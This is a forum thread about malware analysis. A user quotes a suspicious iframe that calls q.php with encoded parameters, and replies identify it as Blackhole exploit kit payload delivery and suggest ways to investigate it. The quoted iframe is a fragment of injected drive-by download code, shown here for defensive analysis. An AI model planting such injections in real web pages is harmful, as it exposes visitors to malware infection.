Thread: obfuscated java script that result to drive-by download

  1. #1

    obfuscated java script that result to drive-by download

    I have been asked to analyze a website with suspicious activity such as drive-by download malware.

    The source code of the page is this:

    <iframe src="/ca172171ce451f92c398830a954d402b/q.php?vywnynlp=30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f"></iframe>
    I can't understand the value of the attribute that is sent to q.php through the GET method:

    vywnynlp=30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f
    Please help me and tell me how I can decode the encrypted value.
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  2. #2
    You can't decode that.

    Woodmann
    Learn Or Die.

  3. #3
    Woodmann's right. You can't.

    However, what you have to understand here, is that this website, was probably built by a hacker to be able to download malware on unsuspecting users. What this means, is that HIS website is not really protected very hard. In fact, I'd reckon he would be focusing more on his drive-by malware download payload execution, rather than HIS own website security.

    So, what does all this mean?

    What it means, son, is that you can use WGET (or any other OFFLINE DOWNLOADER), with the robots.txt set to OFF (wget specific only) and MIRROR the entire goddamned website! THEN, you can decrypt it and encrypt it and do whatever you want with it, because you will now have its 'source code', which HAS to be present to be able to decrypt this gunk.

    Comprende? Let us know how it goes.

    Have Phun

    EDIT1: For some reason, the above looks like MAC addresses. Not sure, just a hunch.
    EDIT2: The kxt= part got me looking and I kind of stumbled upon this link
    Code:
    http://www.ai.mit.edu/courses/6.863/doc/ktext.html
    EDIT3: But the beauty is, if I put in
    Code:
    &kxt=1f:1d:1f:1d:1f:1d:1f
    in Google, I get a LOT of hits - a few are also javascripts which are similar to this. After this, it's a matter of tracing to get to the real meat. Have Phun
    Last edited by Aimless; May 27th, 2013 at 07:36.
    Blame Microsoft, get l337 !!

  4. #4

    Blackhole Exploit Kit Delivery

    Quote Originally Posted by ansar313 View Post
    I have been asked to analyze a website with suspicious activity such as drive-by download malware.

    The source code of the page is this:

    <iframe src="/ca172171ce451f92c398830a954d402b/q.php?vywnynlp=30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f"></iframe>
    I can't understand the value of the attribute that is sent to q.php through the GET method:

    vywnynlp=30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f
    Please help me and tell me how I can decode the encrypted value.
    You are looking at one of many payloads delivered by a Blackhole landing page. It is common to see the q.php? with those parameters when an executable is being delivered. So if you have traffic logs you need to go back a bit and look for the landing page delivery (jar applets, PDFs, etc.). If this was part of a delivery to a system and you have an older version of Java or Flash I would look there first. The Java cache folder and the .idx files there are helpful.

    Something to mention is that they have been delivering executables through jars for a while. What has changed is they are using the jars as a crypto layer on top of the delivery. This is starting to spread to many exploit kits out there.

    Here are some starting points to identify deliveries for this kit if you are interested: http://urlquery.net/search.php?q=%2Fq.php%3F&type=string&start=2013-05-16&end=2013-05-31&max=50; http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html; http://www.malwaresigs.com/category/exploit-kit-signatures/; and many more, just google Blackhole Exploit Kit.

    Deliveries have ranged greatly on this kit. (Citadel, Zeus P2P, Zero Access, Rogue AV, etc.) Sometimes with a downloader in between like pony downloader.

    If you are looking at traffic analysis or malware to reverse then you should not just be looking at that exploit kit but many others. Some that I commonly see are Cool, Styx, Sweet Orange, Redkit, to name a few of the larger ones.
